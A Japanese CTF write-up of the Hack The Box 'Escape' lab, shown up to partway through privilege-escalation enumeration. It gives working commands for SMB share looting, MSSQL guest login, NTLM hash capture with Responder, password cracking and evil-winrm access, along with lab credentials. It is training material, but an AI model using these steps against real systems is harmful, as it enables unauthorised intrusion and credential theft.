初めに
どうも、クソ雑魚のなんちゃてエンジニアです。
本記事は Hack The Box(以下リンク参照) の「Escape」にチャレンジした際のWriteupになります。
※以前までのツールの使い方など詳細を書いたものではないのでご了承ください。
※悪用するのはやめてください。あくまで社会への貢献のためにこれらの技術を使用してください。法に触れるので。
Discovery
ポートスキャン
今回はRustScanで高速スキャンしてみた。
┌──(root㉿kali)-[~]
└─# rustscan -a 10.10.11.202 --top --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.202:53
Open 10.10.11.202:88
Open 10.10.11.202:135
Open 10.10.11.202:139
Open 10.10.11.202:389
Open 10.10.11.202:445
Open 10.10.11.202:464
Open 10.10.11.202:593
Open 10.10.11.202:636
Open 10.10.11.202:9389
Open 10.10.11.202:49667
Open 10.10.11.202:49687
Open 10.10.11.202:49688
Open 10.10.11.202:49708
Open 10.10.11.202:49712
Open 10.10.11.202:55479
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 07:53 EST
Initiating Ping Scan at 07:53
Scanning 10.10.11.202 [4 ports]
Completed Ping Scan at 07:53, 0.25s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:53
Completed Parallel DNS resolution of 1 host. at 07:53, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 07:53
Scanning 10.10.11.202 [16 ports]
Discovered open port 53/tcp on 10.10.11.202
Discovered open port 445/tcp on 10.10.11.202
Discovered open port 135/tcp on 10.10.11.202
Discovered open port 139/tcp on 10.10.11.202
Discovered open port 49688/tcp on 10.10.11.202
Discovered open port 593/tcp on 10.10.11.202
Discovered open port 49687/tcp on 10.10.11.202
Discovered open port 49667/tcp on 10.10.11.202
Discovered open port 49712/tcp on 10.10.11.202
Discovered open port 49708/tcp on 10.10.11.202
Discovered open port 389/tcp on 10.10.11.202
Discovered open port 464/tcp on 10.10.11.202
Discovered open port 88/tcp on 10.10.11.202
Discovered open port 55479/tcp on 10.10.11.202
Discovered open port 636/tcp on 10.10.11.202
Discovered open port 9389/tcp on 10.10.11.202
Completed SYN Stealth Scan at 07:53, 0.42s elapsed (16 total ports)
Nmap scan report for 10.10.11.202
Host is up, received echo-reply ttl 127 (0.20s latency).
Scanned at 2023-03-08 07:53:04 EST for 0s
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49687/tcp open unknown syn-ack ttl 127
49688/tcp open unknown syn-ack ttl 127
49708/tcp open unknown syn-ack ttl 127
49712/tcp open unknown syn-ack ttl 127
55479/tcp open unknown syn-ack ttl 127
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.78 seconds
Raw packets sent: 20 (856B) | Rcvd: 17 (732B)
Windows環境ぽい。色々とPortが開いているので、情報を収集していこうと思う。
ldapのスクリプトも回してさっとAD環境の情報を取得する。
┌──(root㉿kali)-[~]
└─# nmap -p 389 -n -Pn --open 10.10.11.202 --script ldap-rootdse
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 07:53 EST
Nmap scan report for 10.10.11.202
Host is up (0.18s latency).
PORT STATE SERVICE
389/tcp open ldap
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=sequel,DC=htb
| ldapServiceName: sequel.htb:dc$@SEQUEL.HTB
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedControl: 1.2.840.113556.1.4.2090
| supportedControl: 1.2.840.113556.1.4.2205
| supportedControl: 1.2.840.113556.1.4.2204
| supportedControl: 1.2.840.113556.1.4.2206
| supportedControl: 1.2.840.113556.1.4.2211
| supportedControl: 1.2.840.113556.1.4.2239
| supportedControl: 1.2.840.113556.1.4.2255
| supportedControl: 1.2.840.113556.1.4.2256
| supportedControl: 1.2.840.113556.1.4.2309
| supportedControl: 1.2.840.113556.1.4.2330
| supportedControl: 1.2.840.113556.1.4.2354
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=sequel,DC=htb
| serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=sequel,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=sequel,DC=htb
| namingContexts: DC=sequel,DC=htb
| namingContexts: CN=Configuration,DC=sequel,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=sequel,DC=htb
| namingContexts: DC=DomainDnsZones,DC=sequel,DC=htb
| namingContexts: DC=ForestDnsZones,DC=sequel,DC=htb
| isSynchronized: TRUE
| highestCommittedUSN: 159905
| dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=sequel,DC=htb
| dnsHostName: dc.sequel.htb
| defaultNamingContext: DC=sequel,DC=htb
| currentTime: 20230308205315.0Z
|_ configurationNamingContext: CN=Configuration,DC=sequel,DC=htb
Service Info: Host: DC; OS: Windows
Nmap done: 1 IP address (1 host up) scanned in 1.16 seconds
dnsHostName: dc.sequel.htbからドメインの情報がわかった。
Collection
rpcclient
RPCが開いているので列挙できるか試す。
┌──(root㉿kali)-[~/work]
└─# rpcclient 10.10.11.202 -U '' -N
rpcclient $> enumdomains
result was NT_STATUS_ACCESS_DENIED
rpcclient $>
ダメか。
SMB
Port139, 445があいているのでSMB通信が出来るか試してみる。
もしかしたら共有領域になにかヒントになるファイルが落ちている可能性があるので。
パスワードなしで見ることが出来る領域を探っていく。
┌──(root㉿kali)-[~/work]
└─# smbclient --no-pass -L 10.10.11.202
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.202 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
まぁPublicが見るからに怪しいのでこの階層を調べていく。
┌──(root㉿kali)-[~/work]
└─# smbclient -N \\\\10.10.11.202\\Public
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Nov 19 06:51:25 2022
.. D 0 Sat Nov 19 06:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 08:39:43 2022
5184255 blocks of size 4096. 1466750 blocks available
SQL Server Procedures.pdfが怪しいので早速拝借する。まぁ今回は1ファイルだったが、一気にフォルダ階層全部持ってくるコマンドを練習がてら打っておく(Windows環境は貴重なので...)
smb: \>
smb: \>
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (51.7 KiloBytes/sec) (average 51.7 KiloBytes/sec)
smb: \> exit
PDFの中身はこんな感じだった。
PublicUser : GuestUserCantWrite1の情報とMSSQLを使っているという情報がわかった。
Credential Access
MSSQL
MSSQLのHack手順はここら辺を参考にしてください。
MSSQLにアクセスするためにimpacketの便利ツールがあるのでこれを使います。
┌──(root㉿kali)-[~/work]
└─# impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@10.10.11.202
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL>
SQL> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
SQL>
SQL> select @@version;
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
SQL>
SQL> select user_name();
--------------------------------------------------------------------------------------------------------------------------------
guest
SQL>
SQL> enable_xp_cmdshell
[-] ERROR(DC\SQLMOCK): Line 105: User does not have permission to perform this action.
[-] ERROR(DC\SQLMOCK): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(DC\SQLMOCK): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(DC\SQLMOCK): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL> SELECT name FROM master.dbo.sysdatabases;
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
SQL>
SQL>
SQL> SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
SQL>
SQL>
xp_cmdshellでのコマンド実行は出来なさそうである。まぁGuestだし予想は出来ていた。
次に試すのはNTLMハッシュの搾取だ。xp_dirtreeコマンドで飛ばしてみる。
と、その前にresponderを起動しておく。
┌──(root㉿kali)-[~/work]
└─# responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.139]
Responder IPv6 [dead:beef:2::1089]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-O67RVFYV0RX]
Responder Domain Name [F0BS.LOCAL]
Responder DCE-RPC Port [47851]
[+] Listening for events...
さてNTLMハッシュを搾取できるかどうか確認する。
sql_svcのNTLMハッシュの搾取が出来た。
このハッシュを解析してみる。
ハッシュ復号
いつもの頼みますよJohnさん。
まずハッシュファイルを作成する。
続いてJohnさんを起動する。
あ、解析できるタイプか。PTHしなくていいみたいなので、このパスワードを使ってevil-winrmで入ってみる。
入れたので成功のようだ。ただ、このユーザではUserフラグは取れないようなので、横方向の特権昇格が必要そうである。
Privilege Escalation - Horizontal
以下のようにディレクトリ環境を色々探索していると面白そうなLogを見つけた。
*Evil-WinRM* PS C:\Users> cd ../
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/1/2023 8:15 PM PerfLogs
d-r--- 2/6/2023 12:08 PM Program Files
d----- 11/19/2022 3:51 AM Program Files (x86)
d----- 11/19/2022 3:51 AM Public
d----- 2/1/2023 1:02 PM SQLServer
d-r--- 2/1/2023 1:55 PM Users
d----- 2/6/2023 7:21 AM Windows
*Evil-WinRM* PS C:\>
*Evil-WinRM* PS C:\SQLServer> dir
Directory: C:\SQLServer
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/7/2023 8:06 AM Logs
d----- 11/18/2022 1:37 PM SQLEXPR_2019
-a---- 11/18/2022 1:35 PM 6379936 sqlexpress.exe
-a---- 11/18/2022 1:36 PM 268090448 SQLEXPR_x64_ENU.exe
*Evil-WinRM* PS C:\SQLServer> cd Logs
*Evil-WinRM* PS C:\SQLServer\Logs> dir
Directory: C:\SQLServer\Logs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK
このログファイルをダウンロードする。
*Evil-WinRM* PS C:\SQLServer\Logs> download ERRORLOG.BAK ERRORLOG.BAK
Info: Downloading ERRORLOG.BAK to ERRORLOG.BAK
Info: Download successful!
*Evil-WinRM* PS C:\SQLServer\Logs>
中身を確認してみる。
あーPassword入力してるような文字列が見えるので、此奴を試してみる。
┌──(root㉿kali)-[~/work]
└─# evil-winrm -i 10.10.11.202 -u Ryan.Cooper -p NuclearMosquito3
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents>
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> whoami
sequel\ryan.cooper
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents>
いけた!!!
これで横方向の特権昇格に成功し、Userフラグをゲットできました。
Privilege Escalation - Vertical
情報収集
RustHound
BloodHoundの代わりにRustHoundを使います。DockerでBuildを済ませておけば特段exeを手動で送りこむ必要もなくささっとzipファイルが手に入るのでお手軽です。
Buildする場合は以下のコマンドを実行しましょう。
※これはちょっと時間かかります。
┌──(root㉿kali)-[/opt/RustHound]
└─# docker build -t rusthound .
[+] Building 296.4s (11/11) FINISHED
=> [internal] load build definition from Dockerfile 0.1s
=> => transferring dockerfile: 368B 0.0s
=> [internal] load .dockerignore 0.1s
=> => transferring context: 2B 0.0s
=> [internal] load metadata for docker.io/library/rust:1.64-slim-buster 2.9s
=> [1/6] FROM docker.io/library/rust:1.64-slim-buster@sha256:da66962a6c5b9cae84a6e3e9ea67da5507b91ec0b4604016e07f5077286b1b2e 18.7s
=> => resolve docker.io/library/rust:1.64-slim-buster@sha256:da66962a6c5b9cae84a6e3e9ea67da5507b91ec0b4604016e07f5077286b1b2e 0.0s
=> => sha256:e8da65b7aee6fe31a02a9b12e846ecb549032a0e21d23307414d1748fef914d0 194.36MB / 194.36MB 7.7s
=> => sha256:da66962a6c5b9cae84a6e3e9ea67da5507b91ec0b4604016e07f5077286b1b2e 984B / 984B 0.0s
=> => sha256:c761809aae5fe07769dab99f4404ca5d71a954934a74484e48eb06c0260ef484 742B / 742B 0.0s
=> => sha256:085572de3c6eef7d59c5fe4feb8263dffa0425acb73747606391b2a8afec2446 4.85kB / 4.85kB 0.0s
=> => sha256:4500a762c54620411ae491a547c66b61d577c1369ecbf5a7e91b4e153181854b 27.14MB / 27.14MB 1.3s
=> => extracting sha256:4500a762c54620411ae491a547c66b61d577c1369ecbf5a7e91b4e153181854b 3.2s
=> => extracting sha256:e8da65b7aee6fe31a02a9b12e846ecb549032a0e21d23307414d1748fef914d0 10.7s
=> [internal] load build context 0.1s
=> => transferring context: 532.71kB 0.0s
=> [2/6] WORKDIR /usr/src/rusthound 1.6s
=> [3/6] RUN apt-get -y update && apt-get -y install gcc libclang-dev clang libclang-dev libgssapi-krb5-2 libkrb5-dev libsasl2-modules-gssapi-mit m 28.6s
=> [4/6] COPY ./src/ ./src/ 0.1s
=> [5/6] COPY ./Cargo.toml ./Cargo.toml 0.1s
=> [6/6] RUN cargo install --path . 237.5s
=> exporting to image 6.9s
=> => exporting layers 6.9s
=> => writing image sha256:490ee8c18b28affff12ed0cb78992e21209368efd68a64772b027f2bf31f8bc8 0.0s
=> => naming to docker.io/library/rusthound
Buildが出来ていればDockerでRustHoundを回します。
┌──(root㉿kali)-[/opt/RustHound]
└─# docker run -v /opt/RustHound/work:/tmp/htb rusthound -d sequel.htb -i 10.10.11.202 -u 'Ryan.Cooper@sequel.htb' -p 'NuclearMosquito3' -o '/tmp/htb' -z --ldaps
---------------------------------------------------
[2023-03-10T13:50:55Z INFO rusthound] Verbosity level: Info
Initializing RustHound at 13:50:55 on 03/10/23
Powered by g0h4n from OpenCyber
---------------------------------------------------
[2023-03-10T13:50:56Z INFO rusthound::ldap] Connected to SEQUEL.HTB Active Directory!
[2023-03-10T13:50:56Z INFO rusthound::ldap] Starting data collection...
[2023-03-10T13:50:57Z INFO rusthound::ldap] All data collected for NamingContext DC=sequel,DC=htb
[2023-03-10T13:50:57Z INFO rusthound::json::parser] Starting the LDAP objects parsing...
[2023-03-10T13:50:57Z INFO rusthound::json::parser::bh_41] ADCS found DC=htb,DC=sequel,CN=sequel-DC-CA, use --adcs args to collect the certificate templates and certificate authority.
[2023-03-10T13:50:57Z INFO rusthound::json::parser::bh_41] ADCS found DC=htb,DC=sequel,CN=sequel-DC-CA, use --adcs args to collect the certificate templates and certificate authority.
[2023-03-10T13:50:57Z INFO rusthound::json::parser] Parsing LDAP objects finished!
[2023-03-10T13:50:57Z INFO rusthound::json::checker] Starting checker to replace some values...
[2023-03-10T13:50:57Z INFO rusthound::json::checker] Checking and replacing some values finished!
[2023-03-10T13:50:57Z INFO rusthound::json::maker] 10 users parsed!
[2023-03-10T13:50:57Z INFO rusthound::json::maker] 61 groups parsed!
[2023-03-10T13:50:57Z INFO rusthound::json::maker] 1 computers parsed!
[2023-03-10T13:50:57Z INFO rusthound::json::maker] 1 ous parsed!
[2023-03-10T13:50:57Z INFO rusthound::json::maker] 1 domains parsed!
[2023-03-10T13:50:57Z INFO rusthound::json::maker] 2 gpos parsed!
[2023-03-10T13:50:57Z INFO rusthound::json::maker] 21 containers parsed!
RustHound Enumeration Completed at 13:50:57 on 03/10/23! Happy Graphing!
[2023-03-10T13:50:57Z INFO rusthound::json::maker] /tmp/htb/20230310135057_sequel-htb_rusthound.zip created!
┌──(root㉿kali)-[/opt/RustHound]
└─# cd work
┌──(root㉿kali)-[/opt/RustHound/work]
└─# ls -lta
total 152
drwxr-xr-x 2 root root 4096 Mar 10 08:50 .
-rw-r--r-- 1 root root 146882 Mar 10 08:50 20230310135057_sequel-htb_rusthound.zip
drwxr-xr-x 7 root root 4096 Mar 10 08:50 ..
続いてneo4jとbloodhoundを起動します。
┌──(root㉿kali)-[~/work]
└─# neo4j console
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
2023-03-10 13:53:01.546+0000 INFO Starting...
2023-03-10 13:53:02.245+0000 INFO This instance is ServerId{b14b2881} (b14b2881-32dd-490b-82f4-34250c1e77b3)
2023-03-10 13:53:03.742+0000 INFO ======== Neo4j 4.4.16 ========
2023-03-10 13:53:05.791+0000 INFO Initializing system graph model for component 'security-users' with version -1 and status UNINITIALIZED
2023-03-10 13:53:05.806+0000 INFO Setting up initial user from defaults: neo4j
2023-03-10 13:53:05.806+0000 INFO Creating new user 'neo4j' (passwordChangeRequired=true, suspended=false)
2023-03-10 13:53:05.829+0000 INFO Setting version for 'security-users' to 3
2023-03-10 13:53:05.833+0000 INFO After initialization of system graph model component 'security-users' have version 3 and status CURRENT
2023-03-10 13:53:05.837+0000 INFO Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
2023-03-10 13:53:06.249+0000 INFO Bolt enabled on localhost:7687.
2023-03-10 13:53:07.394+0000 INFO Remote interface available at http://localhost:7474/
2023-03-10 13:53:07.397+0000 INFO id: 5A4573E0CADB3BFF4E6EE60B1C3F932B92DB34B0DC5071BB01723BD13BFC98AC
2023-03-10 13:53:07.398+0000 INFO name: system
2023-03-10 13:53:07.398+0000 INFO creationDate: 2023-03-10T13:53:04.517Z
2023-03-10 13:53:07.398+0000 INFO Started.
┌──(root㉿kali)-[~/work]
└─# bloodhound
(node:131685) electron: The default of contextIsolation is deprecated and will be changing from false to true in a future release of Electron. See https://github.com/electron/electron/issues/23506 for more information
(node:131727) [DEP0005] DeprecationWarning: Buffer() is deprecated due to security and usability issues. Please use the Buffer.alloc(), Buffer.allocUnsafe(), or Buffer.from() methods instead.
出来たZIPを投入して確認します。
なんもいいのがない。。。
winPeas
以下からwinPeasのbatファイルをダウンロードし、対象端末上で実行する。
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> .\winPEAS.bat
((,.,/((((((((((((((((((((/, */
,/*,..*(((((((((((((((((((((((((((((((((,
,*/((((((((((((((((((/, .*//((//**, .*((((((*
((((((((((((((((* *****,,,/########## .(* ,((((((
(((((((((((/* ******************/####### .(. ((((((
((((((..******************/@@@@@/***/###### /((((((
,,..**********************@@@@@@@@@@(***,#### ../(((((
, ,**********************#@@@@@#@@@@*********##((/ /((((
..(((##########*********/#@@@@@@@@@/*************,,..((((
.(((################(/******/@@@@@#****************.. /((
.((########################(/************************..*(
.((#############################(/********************.,(
.((##################################(/***************..(
.((######################################(************..(
.((######(,.***.,(###################(..***(/*********..(
.((######*(#####((##################((######/(********..(
.((##################(/**********(################(**...(
.(((####################/*******(###################.((((
.(((((############################################/ /((
..(((((#########################################(..(((((.
....(((((#####################################( .((((((.
......(((((#################################( .(((((((.
(((((((((. ,(############################(../(((((((((.
(((((((((/, ,####################(/..((((((((((.
(((((((((/,. ,*//////*,. ./(((((((((((.
(((((((((((((((((((((((((((/
by carlospolop
/!\ Advisory: WinPEAS - Windows local Privilege Escalation Awesome Script
WinPEAS should be used for authorized penetration testing and/or educational purposes only.
Any misuse of this software will not be the responsibility of the author or of any other collaborator.
Use it at your own networks and/or with the network owner's permission.
[*] BASIC SYSTEM INFO
[+] WINDOWS OS
[i] Check for vulnerabilities for the OS version with the applied patches
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits
winPEAS.bat : Access is denied.
+ CategoryInfo : NotSpecified: (Access is denied.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
...省略
特段いいものがない。。。
Powerless
以下サイトからPoweless.batをダウンロードする。
また、多くのアクセス権の情報を出力させるためAccessChk.exeを以下からダウンロードします。
回します。
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> .\Powerless.bat
------ System Info (Use full output in conjunction with windows-exploit-suggester.py)-------
Powerless.bat : Access is denied.
+ CategoryInfo : NotSpecified: (Access is denied.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
----- Architecture -------
PROCESSOR_ARCHITECTURE=AMD64
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=5507
------ Users and groups (check individual user with 'net user USERNAME' ) Check user privileges for SeImpersonate (rotten potato exploit) -------
Current User: Ryan.Cooper
USER INFORMATION
----------------
User Name SID
================== ==============================================
sequel\ryan.cooper S-1-5-21-4078382237-1492182817-2568127209-1105
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
--- All users, accounts and groups ---
User accounts for \\
-------------------------------------------------------------------------------
Administrator Brandon.Brown Guest
James.Roberts krbtgt Nicole.Thompson
Ryan.Cooper sql_svc Tom.Henn
The command completed with one or more errors.
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 42
Minimum password length: 7
Length of password history maintained: 24
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: PRIMARY
The command completed successfully.
Aliases for \\DC
-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Account Operators
*Administrators
*Allowed RODC Password Replication Group
*Backup Operators
*Cert Publishers
*Certificate Service DCOM Access
*Cryptographic Operators
*Denied RODC Password Replication Group
*Distributed COM Users
*DnsAdmins
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Incoming Forest Trust Builders
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Pre-Windows 2000 Compatible Access
*Print Operators
*RAS and IAS Servers
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Server Operators
*SQLServer2005SQLBrowserUser$DC
*Storage Replica Administrators
